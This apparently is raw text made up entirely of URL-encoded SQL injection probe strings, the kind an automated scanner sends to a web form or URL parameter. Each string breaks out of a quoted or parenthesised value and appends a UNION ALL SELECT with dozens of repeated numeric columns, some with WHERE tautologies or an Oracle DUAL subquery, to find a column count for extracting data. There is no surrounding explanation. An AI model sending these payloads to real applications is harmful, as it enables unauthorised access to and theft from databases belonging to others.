-8183%25%27%20UNION%20ALL%20SELECT%206067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067%2C6067--%20 -1811%25%27%20UNION%20ALL%20SELECT%207452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452%2C7452--%20 -2766%25%27%20UNION%20ALL%20SELECT%204340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340--%20 -2940%25%27%20UNION%20ALL%20SELECT%206210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210%2C6210--%20 -2189%25%27%20UNION%20ALL%20SELECT%207721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721--%20 -8112%25%27%20UNION%20ALL%20SELECT%208053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053--%20 -7516%00%27%29%20UNION%20ALL%20SELECT%205761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761%2C5761--%20 -1436%00%27%29%20UNION%20ALL%20SELECT%208735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735--%20 -2882%00%27%29%20UNION%20ALL%20SELECT%208799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799--%20 -7332%00%27%29%20UNION%20ALL%20SELECT%205308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308%2C5308--%20 -2462%00%27%29%20UNION%20ALL%20SELECT%209883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883--%20 -1678%00%27%29%20UNION%20ALL%20SELECT%208386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386%2C8386--%20 -8611%00%27%29%20UNION%20ALL%20SELECT%207307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307%2C7307--%20 -1903%00%27%29%20UNION%20ALL%20SELECT%203817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817--%20 -3272%00%27%29%20UNION%20ALL%20SELECT%204649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649%2C4649--%20 -3016%00%27%29%20UNION%20ALL%20SELECT%206238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238--%20 -2269%00%27%20UNION%20ALL%20SELECT%202666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666--%20 -9538%00%27%20UNION%20ALL%20SELECT%209613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613--%20 -6255%00%27%20UNION%20ALL%20SELECT%206324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324%2C6324--%20 -1642%00%27%20UNION%20ALL%20SELECT%206472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472--%20 -2258%00%27%20UNION%20ALL%20SELECT%201885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885--%20 -4522%00%27%20UNION%20ALL%20SELECT%209926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926%2C9926--%20 -3337%00%27%20UNION%20ALL%20SELECT%202922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922--%20 -2132%00%27%20UNION%20ALL%20SELECT%204119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119--%20 -2934%00%27%20UNION%20ALL%20SELECT%202107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107%2C2107--%20 -7501%00%27%20UNION%20ALL%20SELECT%205309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309%2C5309--%20 -9308%27%29%20WHERE%205891%3D5891%20UNION%20ALL%20SELECT%205891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891%2C5891--%20 -3992%27%29%20WHERE%206064%3D6064%20UNION%20ALL%20SELECT%206064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064%2C6064--%20 -9582%27%29%20WHERE%205882%3D5882%20UNION%20ALL%20SELECT%205882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882--%20 -1993%27%29%20WHERE%204298%3D4298%20UNION%20ALL%20SELECT%204298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298%2C4298--%20 -2170%27%29%20WHERE%204362%3D4362%20UNION%20ALL%20SELECT%204362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362%2C4362--%20 -9118%27%29%20WHERE%201995%3D1995%20UNION%20ALL%20SELECT%201995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995%2C1995--%20 -4633%27%29%20WHERE%203871%3D3871%20UNION%20ALL%20SELECT%203871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871%2C3871--%20 -4127%27%29%20WHERE%202489%3D2489%20UNION%20ALL%20SELECT%202489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489%2C2489--%20 -3409%27%29%20WHERE%208169%3D8169%20UNION%20ALL%20SELECT%208169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169--%20 -8207%27%29%20WHERE%203130%3D3130%20UNION%20ALL%20SELECT%203130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130--%20 -7976%22%29%20WHERE%207833%3D7833%20UNION%20ALL%20SELECT%207833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833--%20 -7876%22%29%20WHERE%202780%3D2780%20UNION%20ALL%20SELECT%202780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780%2C2780--%20 -7867%22%29%20WHERE%205504%3D5504%20UNION%20ALL%20SELECT%205504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504--%20 -8894%22%29%20WHERE%208263%3D8263%20UNION%20ALL%20SELECT%208263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263--%20 -7352%22%29%20WHERE%207718%3D7718%20UNION%20ALL%20SELECT%207718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718%2C7718--%20 -2929%22%29%20WHERE%204823%3D4823%20UNION%20ALL%20SELECT%204823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823--%20 -9081%22%29%20WHERE%208547%3D8547%20UNION%20ALL%20SELECT%208547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547%2C8547--%20 -8174%22%29%20WHERE%205275%3D5275%20UNION%20ALL%20SELECT%205275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275--%20 -8259%22%29%20WHERE%207587%3D7587%20UNION%20ALL%20SELECT%207587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587--%20 -3769%22%29%20WHERE%204486%3D4486%20UNION%20ALL%20SELECT%204486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486%2C4486--%20 -2243%27%20WHERE%207235%3D7235%20UNION%20ALL%20SELECT%207235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235--%20 -1741%27%20WHERE%207211%3D7211%20UNION%20ALL%20SELECT%207211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211--%20 -2000%27%20WHERE%206231%3D6231%20UNION%20ALL%20SELECT%206231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231%2C6231--%20 -2600%27%20WHERE%204990%3D4990%20UNION%20ALL%20SELECT%204990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990%2C4990--%20 -7147%27%20WHERE%206010%3D6010%20UNION%20ALL%20SELECT%206010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010%2C6010--%20 -5259%27%20WHERE%209218%3D9218%20UNION%20ALL%20SELECT%209218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218--%20 -3732%27%20WHERE%208972%3D8972%20UNION%20ALL%20SELECT%208972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972--%20 -5002%27%20WHERE%201265%3D1265%20UNION%20ALL%20SELECT%201265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265--%20 -1878%27%20WHERE%202669%3D2669%20UNION%20ALL%20SELECT%202669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669--%20 -4393%27%20WHERE%209711%3D9711%20UNION%20ALL%20SELECT%209711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711%2C9711--%20 -5033%22%20WHERE%203069%3D3069%20UNION%20ALL%20SELECT%203069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069%2C3069--%20 -5773%22%20WHERE%204214%3D4214%20UNION%20ALL%20SELECT%204214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214--%20 -5722%22%20WHERE%205605%3D5605%20UNION%20ALL%20SELECT%205605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605--%20 -8644%22%20WHERE%202976%3D2976%20UNION%20ALL%20SELECT%202976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976%2C2976--%20 -9219%22%20WHERE%206834%3D6834%20UNION%20ALL%20SELECT%206834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834--%20 -3178%22%20WHERE%208766%3D8766%20UNION%20ALL%20SELECT%208766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766%2C8766--%20 -4103%22%20WHERE%205370%3D5370%20UNION%20ALL%20SELECT%205370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370--%20 -4466%22%20WHERE%206788%3D6788%20UNION%20ALL%20SELECT%206788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788--%20 -5544%22%20WHERE%208748%3D8748%20UNION%20ALL%20SELECT%208748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748--%20 -8960%22%20WHERE%201981%3D1981%20UNION%20ALL%20SELECT%201981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981%2C1981--%20 -8432%27%7C%7C%28SELECT%20%27eQOq%27%20FROM%20DUAL%20WHERE%206820%3D6820%20UNION%20ALL%20SELECT%206820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820--%20 -9598%27%7C%7C%28SELECT%20%27FJHL%27%20FROM%20DUAL%20WHERE%206695%3D6695%20UNION%20ALL%20SELECT%206695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695%2C6695--%20 -8573%27%7C%7C%28SELECT%20%27eOOn%27%20FROM%20DUAL%20WHERE%205570%3D5570%20UNION%20ALL%20SELECT%205570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570--%20 -7708%27%7C%7C%28SELECT%20%27RSkh%27%20FROM%20DUAL%20WHERE%207754%3D7754%20UNION%20ALL%20SELECT%207754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754%2C7754--%20 